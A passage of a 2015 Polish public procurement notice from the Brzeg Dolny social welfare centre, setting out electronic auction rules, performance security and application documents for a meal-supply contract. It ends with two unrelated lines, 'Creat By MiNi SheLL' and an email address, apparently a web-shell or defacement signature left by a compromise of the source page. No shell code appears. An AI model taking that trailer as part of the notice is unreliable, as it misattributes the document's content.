<p><b>IV.4.9) Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:</b> 1. Wykonawcy, którzy otrzymali zaproszenie do udziału w licytacji elektronicznej, po zalogowaniu się
na platformie, uzyskają możliwość składania ofert.   2.Nie jest wymagany podpis elektroniczny.   3. Ofertę składa się w postaci elektronicznej. Grosze należy oddzielić od złotych kropką.  4. Licytacji 
podlega zryczałtowana cena brutto za 1 (słownie: jeden) posiłek. Od momentu otwarcia licytacji do 
jej zamknięcia Wykonawcy składają kolejne, korzystniejsze oferty (postąpienia) za 1 posiłek brutto, 
które podlegają automatycznej klasyfikacji na podstawie ceny. System umożliwia składanie 
wyłącznie ofert o cenie niższej niż oferta wiodąca w danym momencie.   5. Wykonawcy w 
zryczałtowanej cenie posiłku powinni uwzględnić wymogi zamawiającego oraz wszystkie koszty i 
składniki związane z realizacją zamówienia, w tym m.in. podatek VAT, upusty, rabaty. Należy 
pamiętać, że z wyjątkiem ustawowej zmiany stawki podatku VAT, zaoferowana cena nie ulegnie 
zmianie w okresie obowiązywania umowy.   6. Zamawiający określił minimalną wysokość postąpienia
na 0.05 zł (słownie: pięć groszy) brutto.  7. Oferta złożona w toku licytacji  elektronicznej przestaje
wiązać, w sytuacji złożenia oferty korzystniejszej. Tym samym Wykonawca  nie może cofnąć raz
złożonej przez siebie oferty, może za to składać kolejne oferty w przypadku  przelicytowania
dotychczasowej.  8. Użytkownicy ponoszą odpowiedzialność za informacje  wprowadzone do systemu
i konsekwencje z tego wynikające.     9. W trakcie licytacji elektronicznej  system na bieżąco
udostępnia wszystkim Wykonawcom na platformie informacje o pozycji złożonych  przez nich ofert,
liczbie Wykonawców biorących udział w licytacji elektronicznej  oraz cenach  złożonych przez nich
ofert, z tym że do momentu zamknięcia licytacji elektronicznej nie ujawnia się  informacji
umożliwiających identyfikację Wykonawców. 10. Jedynym  kryterium wyboru będzie cena. 11.
Licytacja elektroniczna jest licytacją jednoetapową, zakończy się  po upływie pięciu minut od
momentu złożenia ostatniego postąpienia..</p>
<p><b>IV.4.10) Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania:</b><br>
<ul class="kh_indent_1"><li><table><tr><td style="font-size: 10pt;"><b>Licytacja jednoetapowa </b>          </td><td></td><td style="font-size: 10pt;"><b>czas trwania:</b> Upływa 5 minut po złożeniu ostatniego postąpienia</td></tr>
</table></li></ul>

<p><b>IV.4.11) Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej:</b> 21.01.2015 godzina 15:00, miejsce: Gminny Ośrodek Pomocy Społecznej, Rynek 18, 56-120 Brzeg Dolny (pok. 11).</p>
<p><b>IV.4.12) Termin otwarcia licytacji elektronicznej:</b> 5 dni po terminie przekazania zaproszeń, o godzinie 10:00. Szczegółowy termin licytacji Zamawiający przekaże w zaproszeniu do składania ofert.</p>
<p><b>IV.4.13) Termin i warunki zamknięcia licytacji elektronicznej </b><i>(jeżeli dotyczy):</i></p>
<p>Licytacja zostanie zamknięta po upływie 5 minut po złożeniu ostatniego postąpienia</p>
<p><b>IV.4.14 Wymagania dotyczące zabezpieczenia należytego wykonania umowy </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>1. Na podstawie art. 147 ust. 1 i 2 ustawy Zamawiający wymaga wniesienia przez Wykonawcę, 
zabezpieczenia należytego wykonania umowy.  2. Wykonawca, którego oferta zostanie wybrana 
będzie zobowiązany wnieść zabezpieczenie należytego wykonania umowy w wysokości 5 % ceny 
brutto podanej w ofercie (przez którą należy rozumieć iloczyn ceny jednostkowej posiłku 
zaoferowanej przez Wykonawcę oraz szacunkowej ilości 38 000 posiłków).  3. Zabezpieczenie może 
być wnoszone w pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy 
oszczędnościowo - kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym, 
gwarancjach bankowych, gwarancjach ubezpieczeniowych lub poręczeniach udzielanych przez 
podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu 
Polskiej Agencji Rozwoju Przedsiębiorczości.  4. Zamawiający nie wyraża zgody na wniesienie 
zabezpieczenia w formach, o których mowa w art. 148 ust. 2 ustawy.  5. Zabezpieczenie wnoszone w
pieniądzu Wykonawca wpłaci przelewem na następujący rachunek  bankowy Zamawiającego: Bank 
Spółdzielczy Oborniki Śląskie Oddział Brzeg Dolny nr  67 9583 1022 0100 1195 2001 0003  6. W 
przypadku wniesienia wadium w pieniądzu, za zgodą Wykonawcy, kwota wadium może zostać 
zaliczona na poczet zabezpieczenia.  7. Dokument wniesiony w formie gwarancji 
bankowej/ubezpieczeniowej powinien zawierać klauzulę o gwarantowaniu wypłaty należności w 
sposób nieodwołalny, bezwarunkowy i na pierwsze żądanie.  8. Wykonawca wniesie zabezpieczenie 
najpóźniej w dniu zawarcia umowy.   9. Zamawiający zwróci zabezpieczenie w terminie 30 dni od 
dnia wykonania zamówienia i uznania przez Zamawiającego za należycie wykonane.  10. 
Wykonawca poprzez wniesienie zabezpieczenia zapewnia  Zamawiającemu możliwość szybkiego
zrekompensowania ewentualnych strat, dlatego też zapisy  gwarancji ubezpieczeniowych/bankowych
nie mogą poprzez nadmierny formalizm i obostrzenia  odbierać Zamawiającemu należnych mu praw.
Dlatego też w gwarancjach niedopuszczalne będą  zapisy warunkujące wypłatę kwoty, która z niej
wynika, np. od udowodnienia przez zamawiającego  nienależytego wykonania lub niewykonania
zamówienia lub takie, wg. których gwarant ma prawo do  stwierdzenia, czy zamówienie zostało
zrealizowane nie należycie albo nie zostało wykonane.  Zamawiający zażąda wykreślenia takich
zapisów (i podobnych) z dokumentu, pod rygorem odmowy jego przyjęcia</p>
<p><b>IV.4.15 Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>Umowa zostanie zawarta na warunkach określonych w załączniku nr 7 do niniejszego ogłoszenia (do 
pobrania na stronie internetowej Zamawiającego http://gops.brzegdolny.pl)</p>
<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Załącznikami do niniejszego ogłoszenia są: Załącznik nr 1 - Wniosek o dopuszczenie do udziału w
licytacji elektronicznej; Załącznik nr 2 - Oświadczenie o spełnianiu warunków - z art. 22 ust. 1 ustawy
Pzp; Załącznik nr 3 - Oświadczenie o braku podstaw do wykluczenia z postępowania; Załącznik nr 4 -
opis przedmiotu zamówienia; Załącznik nr 5 - wzór wykazu zamówień; Załącznik nr 6 - informacja nt.
grupy kapitałowej; Załącznik nr 7 - Wzór umowy. Załączniki te opublikowane są na stronie
internetowej Zamawiającego  http://gops.brzegdolny.pl 2. Wymagania odnośnie pełnomocnictwa (w
przypadku składania oferty  wspólnej lub gdy osoba upoważniona do reprezentowania Wykonawcy
działa na podstawie  pełnomocnictwa). Jeżeli osoba/osoby podpisująca wniosek i dokumenty o
dopuszczenie do udziału w  postępowaniu działa na podstawie pełnomocnictwa, to pełnomocnictwo
to musi w swej treści  jednoznacznie wskazywać uprawnienie do podpisania wniosku i dokumentów.
Pełnomocnictwo to  musi zostać dołączone do wniosku i musi być złożone w oryginale lub kopii
poświadczonej za  zgodność z oryginałem notarialnie. 3.Pozostałe dokumenty należy przedstawić w
formie oryginałów  lub kopii. Dokumenty złożone w formie kopii muszą być opatrzone klauzulą -za
zgodność z  oryginałem- i poświadczone za zgodność z oryginałem przez Wykonawcę. 4. Wszelkie
poprawki lub  zmiany w tekście Wniosku o dopuszczenie do udziału w licytacji elektronicznej muszą
być  parafowane przez osobę uprawnioną do występowania w imieniu Wykonawcy (osobę
podpisującą  wniosek). 5. W przypadku wykonawców wspólnie ubiegających się o udzielenie
zamówienia, każdy z  warunków określonych w pkt. III.3.1-4 winien spełniać co najmniej jeden z tych
wykonawców albo  wszyscy ci wykonawcy wspólnie. 6. Postanowienia dotyczące podmiotów, które
mają siedzibę lub  miejsce zamieszkania poza granicami Rzeczypospolitej stosuje się odpowiednio.
Jeżeli wykonawca  ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej,
zamiast  dokumentów, o których mowa w ppkt III.4.2 składa dokument lub dokumenty wystawione w
kraju, w  którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto
jego  likwidacji ani nie ogłoszono upadłości (wystawiony nie wcześniej niż 6 miesięcy przed upływem 
składania wniosków). Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca 
ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa wyżej, zastępuje
się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do 
reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo 
organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby
lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem - 
wystawione z odpowiednią datą wymaganą dla tych dokumentów. 7. W przypadku wniosku o 
dopuszczenie do udziału w postępowaniu składanego przez wykonawców ubiegających się wspólnie 
o udzielenie zamówienia publicznego, oświadczenie o spełnianiu każdego z warunków, o których 
mowa w art. 22 ust. 1 składa co najmniej jeden z tych wykonawców albo wszyscy ci wykonawcy 
wspólnie. 8. W przypadku wniosku o dopuszczenie do udziału w postępowaniu składanego przez 
wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego, dokumenty 
potwierdzające, że wykonawca nie podlega wykluczeniu składa każdy z wykonawców oddzielnie.  9.
W sytuacji, gdy wykonawca polega na wiedzy i doświadczeniu innych podmiotów, na zasadach
określonych w art. 26 ust. 2 b ustawy, zobowiązany jest udowodnić zamawiającemu, iż będzie
dysponował zasobami niezbędnymi do realizacji zamówienia, przedstawiając w tym celu pisemne (tj.
w oryginale) zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na
okres korzystania z nich przy wykonywaniu zamówienia. Dokument, z którego będzie wynikaćzobowiązanie podmiotu trzeciego powinien wyrażać w sposób wyraźny i jednoznaczny wolę
udzielenia wykonawcy ubiegającego się o udzielenie zamówienia odpowiedniego zasobu, czyli
wskazywać jego zakres, rodzaj, czas udzielenia, a także inne okoliczności, w tym wynikające ze
specyfiki tego zasobu.  Z treści dokumentu musi jasno wynikać:  1) Jaki jest zakres dostępnych
wykonawcy zasobów innego podmiotu,  2) W jaki sposób zostaną wykorzystane zasoby innego
podmiotu, przez wykonawcę, przy wykonywaniu zamówienia,  3) Jakiego charakteru stosunki będą
łączyły wykonawcę z innym podmiotem,  4) Jaki jest zakres i w jakim okresie inny podmiot będzie
brał udział przy wykonywaniu zamówienia.  10. Nawiązując do postanowień art. 24 ust. 2a ustawy z
dnia 29 stycznia 2004 r. Prawo zamówień publicznych Zamawiający przewiduje możliwość 
wykluczenia  z postępowania o udzielenie  zamówienia  wykonawcy, który w okresie  3  lat  przed 
wszczęciem  postępowania,  w  sposób  zawiniony  poważnie  naruszył obowiązki zawodowe, w
szczególności, gdy wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie
wykonał lub nienależycie wykonał zamówienie, co zamawiający jest w stanie  wykazać  za  pomocą 
dowolnych  środków  dowodowych.  Do wykonawcy należy udowodnienie, że podjął konkretne środki 
techniczne,  organizacyjne  i  kadrowe,  które  mają  zapobiec  zawinionemu  i  poważnemu  
naruszaniu  obowiązków  zawodowych  w  przyszłości  oraz  naprawił  szkody  powstałe  w  wyniku
naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia.  11. Wykonawca ma
prawo złożyć tylko jeden wniosek o dopuszczenie do udziału w licytacji elektronicznej.  12.
PRAWIDŁOWO SPORZĄDZONY WNIOSEK O DOPUSZCZENIE DO UDZIAŁU W LICYTACJI POWINIEN 
ZAWIERAĆ CO NAJMNIEJ: 1) Dowód wniesienia wadium; 2) Formularz wniosku (załącznik nr 1 do 
ogłoszenia); 3) Oświadczenie o spełnieniu warunków udziału w postępowaniu, określonych w art. 22 
ust. 1 ustawy Prawo zamówień publicznych (Załącznik Nr 2 do ogłoszenia); 4) Oświadczenie o braku 
podstaw do wykluczenia z postępowania (Załącznik Nr 3 do ogłoszenia); 5) Wykaz zamówień -
sporządzony wg wzoru stanowiącego zał. nr 5 do ogłoszenia; 6) Dowody na  potwierdzenie
należytego wykonania zamówień wykazywanych w wykazie, o którym mowa wyżej; 7) Listę
podmiotów należących do tej samej grupy  kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, albo
informację o tym, że wykonawca nie należy do  grupy kapitałowej (Załącznik nr 6 do ogłoszenia); 8)
Pełnomocnictwo (w przypadku składania oferty  wspólnej lub gdy osoba upoważniona do
reprezentowania Wykonawcy działa na podstawie  pełnomocnictwa).  13. Do kontaktów
Zamawiającym upoważniona jest p. Beata Sokolska, tel./fax 071 319 56 62, email:
gops@brzegdolny.pl.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com